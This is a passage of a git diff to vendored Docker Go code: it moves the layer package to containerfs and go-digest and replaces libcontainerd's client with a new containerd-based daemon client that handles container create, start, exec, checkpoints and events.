+	if err := pathFS.Remove(pathFS.Join(pathFS.Path(), "testfile2.txt")); err != nil {
 		t.Fatal(err)
 	}
 
-	if err := os.Chmod(filepath.Join(path, "testfile3.txt"), 0755); err != nil {
+	if err := pathFS.Lchmod(pathFS.Join(pathFS.Path(), "testfile3.txt"), 0755); err != nil {
 		t.Fatal(err)
 	}
 
-	if err := ioutil.WriteFile(filepath.Join(path, "testfile4.txt"), []byte("mount data!"), 0644); err != nil {
+	if err := driver.WriteFile(pathFS, pathFS.Join(pathFS.Path(), "testfile4.txt"), []byte("mount data!"), 0644); err != nil {
 		t.Fatal(err)
 	}
 
diff --git a/vendor/github.com/docker/docker/layer/mounted_layer.go b/vendor/github.com/docker/docker/layer/mounted_layer.go
index a5cfcfa9bd..d6858c662c 100644
--- a/vendor/github.com/docker/docker/layer/mounted_layer.go
+++ b/vendor/github.com/docker/docker/layer/mounted_layer.go
@@ -1,9 +1,10 @@
-package layer
+package layer // import "github.com/docker/docker/layer"
 
 import (
 	"io"
 
 	"github.com/docker/docker/pkg/archive"
+	"github.com/docker/docker/pkg/containerfs"
 )
 
 type mountedLayer struct {
@@ -88,7 +89,7 @@ type referencedRWLayer struct {
 	*mountedLayer
 }
 
-func (rl *referencedRWLayer) Mount(mountLabel string) (string, error) {
+func (rl *referencedRWLayer) Mount(mountLabel string) (containerfs.ContainerFS, error) {
 	return rl.layerStore.driver.Get(rl.mountedLayer.mountID, mountLabel)
 }
 
diff --git a/vendor/github.com/docker/docker/layer/ro_layer.go b/vendor/github.com/docker/docker/layer/ro_layer.go
index 7c8d233a35..3555e8b027 100644
--- a/vendor/github.com/docker/docker/layer/ro_layer.go
+++ b/vendor/github.com/docker/docker/layer/ro_layer.go
@@ -1,11 +1,11 @@
-package layer
+package layer // import "github.com/docker/docker/layer"
 
 import (
 	"fmt"
 	"io"
 
 	"github.com/docker/distribution"
-	"github.com/docker/distribution/digest"
+	"github.com/opencontainers/go-digest"
 )
 
 type roLayer struct {
@@ -21,31 +21,22 @@ type roLayer struct {
 	references     map[Layer]struct{}
 }
 
-// TarStream for roLayer guarentees that the data that is produced is the exact
+// TarStream for roLayer guarantees that the data that is produced is the exact
 // data that the layer was registered with.
 func (rl *roLayer) TarStream() (io.ReadCloser, error) {
-	r, err := rl.layerStore.store.TarSplitReader(rl.chainID)
+	rc, err := rl.layerStore.getTarStream(rl)
 	if err != nil {
 		return nil, err
 	}
 
-	pr, pw := io.Pipe()
-	go func() {
-		err := rl.layerStore.assembleTarTo(rl.cacheID, r, nil, pw)
-		if err != nil {
-			pw.CloseWithError(err)
-		} else {
-			pw.Close()
-		}
-	}()
-	rc, err := newVerifiedReadCloser(pr, digest.Digest(rl.diffID))
+	vrc, err := newVerifiedReadCloser(rc, digest.Digest(rl.diffID))
 	if err != nil {
 		return nil, err
 	}
-	return rc, nil
+	return vrc, nil
 }
 
-// TarStreamFrom does not make any guarentees to the correctness of the produced
+// TarStreamFrom does not make any guarantees to the correctness of the produced
 // data. As such it should not be used when the layer content must be verified
 // to be an exact match to the registered layer.
 func (rl *roLayer) TarStreamFrom(parent ChainID) (io.ReadCloser, error) {
@@ -63,6 +54,10 @@ func (rl *roLayer) TarStreamFrom(parent ChainID) (io.ReadCloser, error) {
 	return rl.layerStore.driver.Diff(rl.cacheID, parentCacheID)
 }
 
+func (rl *roLayer) CacheID() string {
+	return rl.cacheID
+}
+
 func (rl *roLayer) ChainID() ChainID {
 	return rl.chainID
 }
@@ -130,7 +125,7 @@ func (rl *roLayer) depth() int {
 	return rl.parent.depth() + 1
 }
 
-func storeLayer(tx MetadataTransaction, layer *roLayer) error {
+func storeLayer(tx *fileMetadataTransaction, layer *roLayer) error {
 	if err := tx.SetDiffID(layer.diffID); err != nil {
 		return err
 	}
@@ -151,19 +146,14 @@ func storeLayer(tx MetadataTransaction, layer *roLayer) error {
 			return err
 		}
 	}
-
-	return nil
+	return tx.setOS(layer.layerStore.os)
 }
 
 func newVerifiedReadCloser(rc io.ReadCloser, dgst digest.Digest) (io.ReadCloser, error) {
-	verifier, err := digest.NewDigestVerifier(dgst)
-	if err != nil {
-		return nil, err
-	}
 	return &verifiedReadCloser{
 		rc:       rc,
 		dgst:     dgst,
-		verifier: verifier,
+		verifier: dgst.Verifier(),
 	}, nil
 }
 
diff --git a/vendor/github.com/docker/docker/layer/ro_layer_windows.go b/vendor/github.com/docker/docker/layer/ro_layer_windows.go
index 32bd7182a3..a4f0c8088e 100644
--- a/vendor/github.com/docker/docker/layer/ro_layer_windows.go
+++ b/vendor/github.com/docker/docker/layer/ro_layer_windows.go
@@ -1,4 +1,4 @@
-package layer
+package layer // import "github.com/docker/docker/layer"
 
 import "github.com/docker/distribution"
 
diff --git a/vendor/github.com/docker/docker/libcontainerd/client.go b/vendor/github.com/docker/docker/libcontainerd/client.go
deleted file mode 100644
index c14c1c5e46..0000000000
--- a/vendor/github.com/docker/docker/libcontainerd/client.go
+++ /dev/null
@@ -1,46 +0,0 @@
-package libcontainerd
-
-import (
-	"fmt"
-	"sync"
-
-	"github.com/docker/docker/pkg/locker"
-)
-
-// clientCommon contains the platform agnostic fields used in the client structure
-type clientCommon struct {
-	backend    Backend
-	containers map[string]*container
-	locker     *locker.Locker
-	mapMutex   sync.RWMutex // protects read/write oprations from containers map
-}
-
-func (clnt *client) lock(containerID string) {
-	clnt.locker.Lock(containerID)
-}
-
-func (clnt *client) unlock(containerID string) {
-	clnt.locker.Unlock(containerID)
-}
-
-// must hold a lock for cont.containerID
-func (clnt *client) appendContainer(cont *container) {
-	clnt.mapMutex.Lock()
-	clnt.containers[cont.containerID] = cont
-	clnt.mapMutex.Unlock()
-}
-func (clnt *client) deleteContainer(containerID string) {
-	clnt.mapMutex.Lock()
-	delete(clnt.containers, containerID)
-	clnt.mapMutex.Unlock()
-}
-
-func (clnt *client) getContainer(containerID string) (*container, error) {
-	clnt.mapMutex.RLock()
-	container, ok := clnt.containers[containerID]
-	defer clnt.mapMutex.RUnlock()
-	if !ok {
-		return nil, fmt.Errorf("invalid container: %s", containerID) // fixme: typed error
-	}
-	return container, nil
-}
diff --git a/vendor/github.com/docker/docker/libcontainerd/client_daemon.go b/vendor/github.com/docker/docker/libcontainerd/client_daemon.go
new file mode 100644
index 0000000000..0706fa4daa
--- /dev/null
+++ b/vendor/github.com/docker/docker/libcontainerd/client_daemon.go
@@ -0,0 +1,894 @@
+// +build !windows
+
+package libcontainerd // import "github.com/docker/docker/libcontainerd"
+
+import (
+	"context"
+	"encoding/json"
+	"fmt"
+	"io"
+	"os"
+	"path/filepath"
+	"reflect"
+	"runtime"
+	"strings"
+	"sync"
+	"syscall"
+	"time"
+
+	"github.com/containerd/containerd"
+	apievents "github.com/containerd/containerd/api/events"
+	"github.com/containerd/containerd/api/types"
+	"github.com/containerd/containerd/archive"
+	"github.com/containerd/containerd/cio"
+	"github.com/containerd/containerd/content"
+	containerderrors "github.com/containerd/containerd/errdefs"
+	"github.com/containerd/containerd/events"
+	"github.com/containerd/containerd/images"
+	"github.com/containerd/containerd/runtime/linux/runctypes"
+	"github.com/containerd/typeurl"
+	"github.com/docker/docker/errdefs"
+	"github.com/docker/docker/pkg/ioutils"
+	"github.com/opencontainers/image-spec/specs-go/v1"
+	specs "github.com/opencontainers/runtime-spec/specs-go"
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
+	"google.golang.org/grpc/codes"
+	"google.golang.org/grpc/status"
+)
+
+// InitProcessName is the name given to the first process of a
+// container
+const InitProcessName = "init"
+
+type container struct {
+	mu sync.Mutex
+
+	bundleDir string
+	ctr       containerd.Container
+	task      containerd.Task
+	execs     map[string]containerd.Process
+	oomKilled bool
+}
+
+func (c *container) setTask(t containerd.Task) {
+	c.mu.Lock()
+	c.task = t
+	c.mu.Unlock()
+}
+
+func (c *container) getTask() containerd.Task {
+	c.mu.Lock()
+	t := c.task
+	c.mu.Unlock()
+	return t
+}
+
+func (c *container) addProcess(id string, p containerd.Process) {
+	c.mu.Lock()
+	if c.execs == nil {
+		c.execs = make(map[string]containerd.Process)
+	}
+	c.execs[id] = p
+	c.mu.Unlock()
+}
+
+func (c *container) deleteProcess(id string) {
+	c.mu.Lock()
+	delete(c.execs, id)
+	c.mu.Unlock()
+}
+
+func (c *container) getProcess(id string) containerd.Process {
+	c.mu.Lock()
+	p := c.execs[id]
+	c.mu.Unlock()
+	return p
+}
+
+func (c *container) setOOMKilled(killed bool) {
+	c.mu.Lock()
+	c.oomKilled = killed
+	c.mu.Unlock()
+}
+
+func (c *container) getOOMKilled() bool {
+	c.mu.Lock()
+	killed := c.oomKilled
+	c.mu.Unlock()
+	return killed
+}
+
+type client struct {
+	sync.RWMutex // protects containers map
+
+	remote   *containerd.Client
+	stateDir string
+	logger   *logrus.Entry
+
+	namespace  string
+	backend    Backend
+	eventQ     queue
+	containers map[string]*container
+}
+
+func (c *client) reconnect() error {
+	c.Lock()
+	err := c.remote.Reconnect()
+	c.Unlock()
+	return err
+}
+
+func (c *client) setRemote(remote *containerd.Client) {
+	c.Lock()
+	c.remote = remote
+	c.Unlock()
+}
+
+func (c *client) getRemote() *containerd.Client {
+	c.RLock()
+	remote := c.remote
+	c.RUnlock()
+	return remote
+}
+
+func (c *client) Version(ctx context.Context) (containerd.Version, error) {
+	return c.getRemote().Version(ctx)
+}
+
+// Restore loads the containerd container.
+// It should not be called concurrently with any other operation for the given ID.
+func (c *client) Restore(ctx context.Context, id string, attachStdio StdioCallback) (alive bool, pid int, err error) {
+	c.Lock()
+	_, ok := c.containers[id]
+	if ok {
+		c.Unlock()
+		return false, 0, errors.WithStack(newConflictError("id already in use"))
+	}
+
+	cntr := &container{}
+	c.containers[id] = cntr
+	cntr.mu.Lock()
+	defer cntr.mu.Unlock()
+
+	c.Unlock()
+
+	defer func() {
+		if err != nil {
+			c.Lock()
+			delete(c.containers, id)
+			c.Unlock()
+		}
+	}()
+
+	var dio *cio.DirectIO
+	defer func() {
+		if err != nil && dio != nil {
+			dio.Cancel()
+			dio.Close()
+		}
+		err = wrapError(err)
+	}()
+
+	ctr, err := c.getRemote().LoadContainer(ctx, id)
+	if err != nil {
+		return false, -1, errors.WithStack(wrapError(err))
+	}
+
+	attachIO := func(fifos *cio.FIFOSet) (cio.IO, error) {
+		// dio must be assigned to the previously defined dio for the defer above
+		// to handle cleanup
+		dio, err = cio.NewDirectIO(ctx, fifos)
+		if err != nil {
+			return nil, err
+		}
+		return attachStdio(dio)
+	}
+	t, err := ctr.Task(ctx, attachIO)
+	if err != nil && !containerderrors.IsNotFound(err) {
+		return false, -1, errors.Wrap(wrapError(err), "error getting containerd task for container")
+	}
+
+	if t != nil {
+		s, err := t.Status(ctx)
+		if err != nil {
+			return false, -1, errors.Wrap(wrapError(err), "error getting task status")
+		}
+
+		alive = s.Status != containerd.Stopped
+		pid = int(t.Pid())
+	}
+
+	cntr.bundleDir = filepath.Join(c.stateDir, id)
+	cntr.ctr = ctr
+	cntr.task = t
+	// TODO(mlaventure): load execs
+
+	c.logger.WithFields(logrus.Fields{
+		"container": id,
+		"alive":     alive,
+		"pid":       pid,
+	}).Debug("restored container")
+
+	return alive, pid, nil
+}
+
+func (c *client) Create(ctx context.Context, id string, ociSpec *specs.Spec, runtimeOptions interface{}) error {
+	if ctr := c.getContainer(id); ctr != nil {
+		return errors.WithStack(newConflictError("id already in use"))
+	}
+
+	bdir, err := prepareBundleDir(filepath.Join(c.stateDir, id), ociSpec)
+	if err != nil {
+		return errdefs.System(errors.Wrap(err, "prepare bundle dir failed"))
+	}
+
+	c.logger.WithField("bundle", bdir).WithField("root", ociSpec.Root.Path).Debug("bundle dir created")
+
+	cdCtr, err := c.getRemote().NewContainer(ctx, id,
+		containerd.WithSpec(ociSpec),
+		// TODO(mlaventure): when containerd support lcow, revisit runtime value
+		containerd.WithRuntime(fmt.Sprintf("io.containerd.runtime.v1.%s", runtime.GOOS), runtimeOptions))
+	if err != nil {
+		return wrapError(err)
+	}
+
+	c.Lock()
+	c.containers[id] = &container{
+		bundleDir: bdir,
+		ctr:       cdCtr,
+	}
+	c.Unlock()
+
+	return nil
+}
+
+// Start create and start a task for the specified containerd id
+func (c *client) Start(ctx context.Context, id, checkpointDir string, withStdin bool, attachStdio StdioCallback) (int, error) {
+	ctr := c.getContainer(id)
+	if ctr == nil {
+		return -1, errors.WithStack(newNotFoundError("no such container"))
+	}
+	if t := ctr.getTask(); t != nil {
+		return -1, errors.WithStack(newConflictError("container already started"))
+	}
+
+	var (
+		cp             *types.Descriptor
+		t              containerd.Task
+		rio            cio.IO
+		err            error
+		stdinCloseSync = make(chan struct{})
+	)
+
+	if checkpointDir != "" {
+		// write checkpoint to the content store
+		tar := archive.Diff(ctx, "", checkpointDir)
+		cp, err = c.writeContent(ctx, images.MediaTypeContainerd1Checkpoint, checkpointDir, tar)
+		// remove the checkpoint when we're done
+		defer func() {
+			if cp != nil {
+				err := c.getRemote().ContentStore().Delete(context.Background(), cp.Digest)
+				if err != nil {
+					c.logger.WithError(err).WithFields(logrus.Fields{
+						"ref":    checkpointDir,
+						"digest": cp.Digest,
+					}).Warnf("failed to delete temporary checkpoint entry")
+				}
+			}
+		}()
+		if err := tar.Close(); err != nil {
+			return -1, errors.Wrap(err, "failed to close checkpoint tar stream")
+		}
+		if err != nil {
+			return -1, errors.Wrapf(err, "failed to upload checkpoint to containerd")
+		}
+	}
+
+	spec, err := ctr.ctr.Spec(ctx)
+	if err != nil {
+		return -1, errors.Wrap(err, "failed to retrieve spec")
+	}
+	uid, gid := getSpecUser(spec)
+	t, err = ctr.ctr.NewTask(ctx,
+		func(id string) (cio.IO, error) {
+			fifos := newFIFOSet(ctr.bundleDir, InitProcessName, withStdin, spec.Process.Terminal)
+
+			rio, err = c.createIO(fifos, id, InitProcessName, stdinCloseSync, attachStdio)
+			return rio, err
+		},
+		func(_ context.Context, _ *containerd.Client, info *containerd.TaskInfo) error {
+			info.Checkpoint = cp
+			info.Options = &runctypes.CreateOptions{
+				IoUid:       uint32(uid),
+				IoGid:       uint32(gid),
+				NoPivotRoot: os.Getenv("DOCKER_RAMDISK") != "",
+			}
+			return nil
+		})
+	if err != nil {
+		close(stdinCloseSync)
+		if rio != nil {
+			rio.Cancel()
+			rio.Close()
+		}
+		return -1, wrapError(err)
+	}
+
+	ctr.setTask(t)
+
+	// Signal c.createIO that it can call CloseIO
+	close(stdinCloseSync)
+
+	if err := t.Start(ctx); err != nil {
+		if _, err := t.Delete(ctx); err != nil {
+			c.logger.WithError(err).WithField("container", id).
+				Error("failed to delete task after fail start")
+		}
+		ctr.setTask(nil)
+		return -1, wrapError(err)
+	}
+
+	return int(t.Pid()), nil
+}
+
+func (c *client) Exec(ctx context.Context, containerID, processID string, spec *specs.Process, withStdin bool, attachStdio StdioCallback) (int, error) {
+	ctr := c.getContainer(containerID)
+	if ctr == nil {
+		return -1, errors.WithStack(newNotFoundError("no such container"))
+	}
+	t := ctr.getTask()
+	if t == nil {
+		return -1, errors.WithStack(newInvalidParameterError("container is not running"))
+	}
+
+	if p := ctr.getProcess(processID); p != nil {
+		return -1, errors.WithStack(newConflictError("id already in use"))
+	}
+
+	var (
+		p              containerd.Process
+		rio            cio.IO
+		err            error
+		stdinCloseSync = make(chan struct{})
+	)
+
+	fifos := newFIFOSet(ctr.bundleDir, processID, withStdin, spec.Terminal)
+
+	defer func() {
+		if err != nil {
+			if rio != nil {
+				rio.Cancel()
+				rio.Close()
+			}
+		}
+	}()
+
+	p, err = t.Exec(ctx, processID, spec, func(id string) (cio.IO, error) {
+		rio, err = c.createIO(fifos, containerID, processID, stdinCloseSync, attachStdio)
+		return rio, err
+	})
+	if err != nil {
+		close(stdinCloseSync)
+		return -1, wrapError(err)
+	}
+
+	ctr.addProcess(processID, p)
+
+	// Signal c.createIO that it can call CloseIO
+	close(stdinCloseSync)
+
+	if err = p.Start(ctx); err != nil {
+		p.Delete(context.Background())
+		ctr.deleteProcess(processID)
+		return -1, wrapError(err)
+	}
+
+	return int(p.Pid()), nil
+}
+
+func (c *client) SignalProcess(ctx context.Context, containerID, processID string, signal int) error {
+	p, err := c.getProcess(containerID, processID)
+	if err != nil {
+		return err
+	}
+	return wrapError(p.Kill(ctx, syscall.Signal(signal)))
+}
+
+func (c *client) ResizeTerminal(ctx context.Context, containerID, processID string, width, height int) error {
+	p, err := c.getProcess(containerID, processID)
+	if err != nil {
+		return err
+	}
+
+	return p.Resize(ctx, uint32(width), uint32(height))
+}
+
+func (c *client) CloseStdin(ctx context.Context, containerID, processID string) error {
+	p, err := c.getProcess(containerID, processID)
+	if err != nil {
+		return err
+	}
+
+	return p.CloseIO(ctx, containerd.WithStdinCloser)
+}
+
+func (c *client) Pause(ctx context.Context, containerID string) error {
+	p, err := c.getProcess(containerID, InitProcessName)
+	if err != nil {
+		return err
+	}
+
+	return wrapError(p.(containerd.Task).Pause(ctx))
+}
+
+func (c *client) Resume(ctx context.Context, containerID string) error {
+	p, err := c.getProcess(containerID, InitProcessName)
+	if err != nil {
+		return err
+	}
+
+	return p.(containerd.Task).Resume(ctx)
+}
+
+func (c *client) Stats(ctx context.Context, containerID string) (*Stats, error) {
+	p, err := c.getProcess(containerID, InitProcessName)
+	if err != nil {
+		return nil, err
+	}
+
+	m, err := p.(containerd.Task).Metrics(ctx)
+	if err != nil {
+		return nil, err
+	}
+
+	v, err := typeurl.UnmarshalAny(m.Data)
+	if err != nil {
+		return nil, err
+	}
+	return interfaceToStats(m.Timestamp, v), nil
+}
+
+func (c *client) ListPids(ctx context.Context, containerID string) ([]uint32, error) {
+	p, err := c.getProcess(containerID, InitProcessName)
+	if err != nil {
+		return nil, err
+	}
+
+	pis, err := p.(containerd.Task).Pids(ctx)
+	if err != nil {
+		return nil, err
+	}
+
+	var pids []uint32
+	for _, i := range pis {
+		pids = append(pids, i.Pid)
+	}
+
+	return pids, nil
+}
+
+func (c *client) Summary(ctx context.Context, containerID string) ([]Summary, error) {
+	p, err := c.getProcess(containerID, InitProcessName)
+	if err != nil {
+		return nil, err
+	}
+
+	pis, err := p.(containerd.Task).Pids(ctx)
+	if err != nil {
+		return nil, err
+	}
+
+	var infos []Summary
+	for _, pi := range pis {
+		i, err := typeurl.UnmarshalAny(pi.Info)
+		if err != nil {
+			return nil, errors.Wrap(err, "unable to decode process details")
+		}
+		s, err := summaryFromInterface(i)
+		if err != nil {
+			return nil, err
+		}
+		infos = append(infos, *s)
+	}
+
+	return infos, nil
+}
+
+func (c *client) DeleteTask(ctx context.Context, containerID string) (uint32, time.Time, error) {
+	p, err := c.getProcess(containerID, InitProcessName)
+	if err != nil {
+		return 255, time.Now(), nil
+	}
+
+	status, err := p.(containerd.Task).Delete(ctx)
+	if err != nil {
+		return 255, time.Now(), nil
+	}
+
+	if ctr := c.getContainer(containerID); ctr != nil {
+		ctr.setTask(nil)
+	}
+	return status.ExitCode(), status.ExitTime(), nil
+}
+
+func (c *client) Delete(ctx context.Context, containerID string) error {
+	ctr := c.getContainer(containerID)
+	if ctr == nil {
+		return errors.WithStack(newNotFoundError("no such container"))
+	}
+
+	if err := ctr.ctr.Delete(ctx); err != nil {
+		return wrapError(err)
+	}
+
+	if os.Getenv("LIBCONTAINERD_NOCLEAN") != "1" {
+		if err := os.RemoveAll(ctr.bundleDir); err != nil {
+			c.logger.WithError(err).WithFields(logrus.Fields{
+				"container": containerID,
+				"bundle":    ctr.bundleDir,
+			}).Error("failed to remove state dir")
+		}
+	}
+
+	c.removeContainer(containerID)
+
+	return nil
+}
+
+func (c *client) Status(ctx context.Context, containerID string) (Status, error) {
+	ctr := c.getContainer(containerID)
+	if ctr == nil {
+		return StatusUnknown, errors.WithStack(newNotFoundError("no such container"))
+	}
+
+	t := ctr.getTask()
+	if t == nil {
+		return StatusUnknown, errors.WithStack(newNotFoundError("no such task"))
+	}
+
+	s, err := t.Status(ctx)
+	if err != nil {
+		return StatusUnknown, wrapError(err)
+	}
+
+	return Status(s.Status), nil
+}
+
+func (c *client) CreateCheckpoint(ctx context.Context, containerID, checkpointDir string, exit bool) error {
+	p, err := c.getProcess(containerID, InitProcessName)
+	if err != nil {
+		return err
+	}
+
+	img, err := p.(containerd.Task).Checkpoint(ctx)
+	if err != nil {
+		return wrapError(err)
+	}
+	// Whatever happens, delete the checkpoint from containerd
+	defer func() {
+		err := c.getRemote().ImageService().Delete(context.Background(), img.Name())
+		if err != nil {
+			c.logger.WithError(err).WithField("digest", img.Target().Digest).
+				Warnf("failed to delete checkpoint image")
+		}
+	}()
+
+	b, err := content.ReadBlob(ctx, c.getRemote().ContentStore(), img.Target())
+	if err != nil {
+		return errdefs.System(errors.Wrapf(err, "failed to retrieve checkpoint data"))
+	}
+	var index v1.Index
+	if err := json.Unmarshal(b, &index); err != nil {
+		return errdefs.System(errors.Wrapf(err, "failed to decode checkpoint data"))
+	}
+
+	var cpDesc *v1.Descriptor
+	for _, m := range index.Manifests {
+		if m.MediaType == images.MediaTypeContainerd1Checkpoint {
+			cpDesc = &m
+			break
+		}
+	}
+	if cpDesc == nil {
+		return errdefs.System(errors.Wrapf(err, "invalid checkpoint"))
+	}
+
+	rat, err := c.getRemote().ContentStore().ReaderAt(ctx, *cpDesc)
+	if err != nil {
+		return errdefs.System(errors.Wrapf(err, "failed to get checkpoint reader"))
+	}
+	defer rat.Close()
+	_, err = archive.Apply(ctx, checkpointDir, content.NewReader(rat))
+	if err != nil {
+		return errdefs.System(errors.Wrapf(err, "failed to read checkpoint reader"))
+	}
+
+	return err
+}
+
+func (c *client) getContainer(id string) *container {
+	c.RLock()
+	ctr := c.containers[id]
+	c.RUnlock()
+
+	return ctr
+}
+
+func (c *client) removeContainer(id string) {
+	c.Lock()
+	delete(c.containers, id)
+	c.Unlock()
+}
+
+func (c *client) getProcess(containerID, processID string) (containerd.Process, error) {
+	ctr := c.getContainer(containerID)
+	if ctr == nil {
+		return nil, errors.WithStack(newNotFoundError("no such container"))
+	}
+
+	t := ctr.getTask()
+	if t == nil {
+		return nil, errors.WithStack(newNotFoundError("container is not running"))
+	}
+	if processID == InitProcessName {
+		return t, nil
+	}
+
+	p := ctr.getProcess(processID)
+	if p == nil {
+		return nil, errors.WithStack(newNotFoundError("no such exec"))
+	}
+	return p, nil
+}
+
+// createIO creates the io to be used by a process
+// This needs to get a pointer to interface as upon closure the process may not have yet been registered
+func (c *client) createIO(fifos *cio.FIFOSet, containerID, processID string, stdinCloseSync chan struct{}, attachStdio StdioCallback) (cio.IO, error) {
+	var (
+		io  *cio.DirectIO
+		err error
+	)
+
+	io, err = cio.NewDirectIO(context.Background(), fifos)
+	if err != nil {
+		return nil, err
+	}
+
+	if io.Stdin != nil {
+		var (
+			err       error
+			stdinOnce sync.Once
+		)
+		pipe := io.Stdin
+		io.Stdin = ioutils.NewWriteCloserWrapper(pipe, func() error {
+			stdinOnce.Do(func() {
+				err = pipe.Close()
+				// Do the rest in a new routine to avoid a deadlock if the
+				// Exec/Start call failed.
+				go func() {
+					<-stdinCloseSync
+					p, err := c.getProcess(containerID, processID)
+					if err == nil {
+						err = p.CloseIO(context.Background(), containerd.WithStdinCloser)
+						if err != nil && strings.Contains(err.Error(), "transport is closing") {
+							err = nil
+						}
+					}
+				}()
+			})
+			return err
+		})
+	}
+
+	rio, err := attachStdio(io)
+	if err != nil {
+		io.Cancel()
+		io.Close()
+	}
+	return rio, err
+}
+
+func (c *client) processEvent(ctr *container, et EventType, ei EventInfo) {
+	c.eventQ.append(ei.ContainerID, func() {
+		err := c.backend.ProcessEvent(ei.ContainerID, et, ei)
+		if err != nil {
+			c.logger.WithError(err).WithFields(logrus.Fields{
+				"container":  ei.ContainerID,
+				"event":      et,
+				"event-info": ei,
+			}).Error("failed to process event")
+		}
+
+		if et == EventExit && ei.ProcessID != ei.ContainerID {
+			p := ctr.getProcess(ei.ProcessID)
+			if p == nil {
+				c.logger.WithError(errors.New("no such process")).
+					WithFields(logrus.Fields{
+						"container": ei.ContainerID,
+						"process":   ei.ProcessID,
+					}).Error("exit event")
+				return
+			}
+			_, err = p.Delete(context.Background())
+			if err != nil {
+				c.logger.WithError(err).WithFields(logrus.Fields{
+					"container": ei.ContainerID,
+					"process":   ei.ProcessID,
+				}).Warn("failed to delete process")
+			}
+			ctr.deleteProcess(ei.ProcessID)
+
+			ctr := c.getContainer(ei.ContainerID)
+			if ctr == nil {
+				c.logger.WithFields(logrus.Fields{
+					"container": ei.ContainerID,
+				}).Error("failed to find container")
+			} else {
+				newFIFOSet(ctr.bundleDir, ei.ProcessID, true, false).Close()
+			}
+		}
+	})
+}
+
+func (c *client) processEventStream(ctx context.Context) {
+	var (
+		err error
+		ev  *events.Envelope
+		et  EventType
+		ei  EventInfo
+		ctr *container
+	)
+
+	// Filter on both namespace *and* topic. To create an "and" filter,
+	// this must be a single, comma-separated string
+	eventStream, errC := c.getRemote().EventService().Subscribe(ctx, "namespace=="+c.namespace+",topic~=|^/tasks/|")
+
+	c.logger.WithField("namespace", c.namespace).Debug("processing event stream")
+
+	var oomKilled bool
+	for {
+		select {
+		case err = <-errC:
+			if err != nil {
+				errStatus, ok := status.FromError(err)
+				if !ok || errStatus.Code() != codes.Canceled {
+					c.logger.WithError(err).Error("failed to get event")
+					go c.processEventStream(ctx)
+				} else {
+					c.logger.WithError(ctx.Err()).Info("stopping event stream following graceful shutdown")
+				}
+			}
+			return
+		case ev = <-eventStream:
+			if ev.Event == nil {
+				c.logger.WithField("event", ev).Warn("invalid event")
+				continue
+			}
+
+			v, err := typeurl.UnmarshalAny(ev.Event)
+			if err != nil {
+				c.logger.WithError(err).WithField("event", ev).Warn("failed to unmarshal event")
+				continue
+			}
+
+			c.logger.WithField("topic", ev.Topic).Debug("event")
+
+			switch t := v.(type) {
+			case *apievents.TaskCreate:
+				et = EventCreate
+				ei = EventInfo{
+					ContainerID: t.ContainerID,
+					ProcessID:   t.ContainerID,
+					Pid:         t.Pid,
+				}
+			case *apievents.TaskStart:
+				et = EventStart
+				ei = EventInfo{
+					ContainerID: t.ContainerID,
+					ProcessID:   t.ContainerID,
+					Pid:         t.Pid,
+				}
+			case *apievents.TaskExit:
+				et = EventExit
+				ei = EventInfo{
+					ContainerID: t.ContainerID,
+					ProcessID:   t.ID,
+					Pid:         t.Pid,
+					ExitCode:    t.ExitStatus,
+					ExitedAt:    t.ExitedAt,
+				}
+			case *apievents.TaskOOM:
+				et = EventOOM
+				ei = EventInfo{
+					ContainerID: t.ContainerID,
+					OOMKilled:   true,
+				}
+				oomKilled = true
+			case *apievents.TaskExecAdded:
+				et = EventExecAdded
+				ei = EventInfo{
+					ContainerID: t.ContainerID,
+					ProcessID:   t.ExecID,
+				}
+			case *apievents.TaskExecStarted:
+				et = EventExecStarted
+				ei = EventInfo{
+					ContainerID: t.ContainerID,
+					ProcessID:   t.ExecID,
+					Pid:         t.Pid,
+				}
+			case *apievents.TaskPaused:
+				et = EventPaused
+				ei = EventInfo{
+					ContainerID: t.ContainerID,
+				}
+			case *apievents.TaskResumed:
+				et = EventResumed
+				ei = EventInfo{
+					ContainerID: t.ContainerID,
+				}
+			default:
+				c.logger.WithFields(logrus.Fields{
+					"topic": ev.Topic,
+					"type":  reflect.TypeOf(t)},
+				).Info("ignoring event")
+				continue
+			}
+
+			ctr = c.getContainer(ei.ContainerID)
+			if ctr == nil {
+				c.logger.WithField("container", ei.ContainerID).Warn("unknown container")
+				continue
+			}
+
+			if oomKilled {
+				ctr.setOOMKilled(true)
+				oomKilled = false
+			}
+			ei.OOMKilled = ctr.getOOMKilled()
+
+			c.processEvent(ctr, et, ei)
+		}
+	}
+}
+
+func (c *client) writeContent(ctx context.Context, mediaType, ref string, r io.Reader) (*types.Descriptor, error) {
+	writer, err := c.getRemote().ContentStore().Writer(ctx, content.WithRef(ref))
+	if err != nil {
+		return nil, err
+	}
+	defer writer.Close()
+	size, err := io.Copy(writer, r)
+	if err != nil {
+		return nil, err
+	}
+	labels := map[string]string{
+		"containerd.io/gc.root": time.Now().UTC().Format(time.RFC3339),
+	}
+	if err := writer.Commit(ctx, 0, "", content.WithLabels(labels)); err != nil {
+		return nil, err
+	}
+	return &types.Descriptor{
+		MediaType: mediaType,
+		Digest:    writer.Digest(),
+		Size_:     size,
+	}, nil
+}
+
+func wrapError(err error) error {
+	switch {
+	case err == nil:
+		return nil
+	case containerderrors.IsNotFound(err):
+		return errdefs.NotFound(err)
+	}
+
+	msg := err.Error()
+	for _, s := range []string{"container does not exist", "not found", "no such container"} {
+		if strings.Contains(msg, s) {
+			return errdefs.NotFound(err)
+		}
+	}
+	return err
+}
diff --git a/vendor/github.com/docker/docker/libcontainerd/client_daemon_linux.go b/vendor/github.com/docker/docker/libcontainerd/client_daemon_linux.go
new file mode 100644
index 0000000000..b57c4d3c50
--- /dev/null
+++ b/vendor/github.com/docker/docker/libcontainerd/client_daemon_linux.go
@@ -0,0 +1,108 @@
+package libcontainerd // import "github.com/docker/docker/libcontainerd"
+
+import (
+	"context"
+	"fmt"
+	"os"
+	"path/filepath"
+	"strings"
+
+	"github.com/containerd/containerd"
+	"github.com/containerd/containerd/cio"
+	"github.com/docker/docker/pkg/idtools"
+	"github.com/opencontainers/runtime-spec/specs-go"
+	"github.com/sirupsen/logrus"
+)
+
+func summaryFromInterface(i interface{}) (*Summary, error) {
+	return &Summary{}, nil
+}
+
+func (c *client) UpdateResources(ctx context.Context, containerID string, resources *Resources) error {
+	p, err := c.getProcess(containerID, InitProcessName)
+	if err != nil {
+		return err
+	}
+
+	// go doesn't like the alias in 1.8, this means this need to be
+	// platform specific
+	return p.(containerd.Task).Update(ctx, containerd.WithResources((*specs.LinuxResources)(resources)))
+}
+
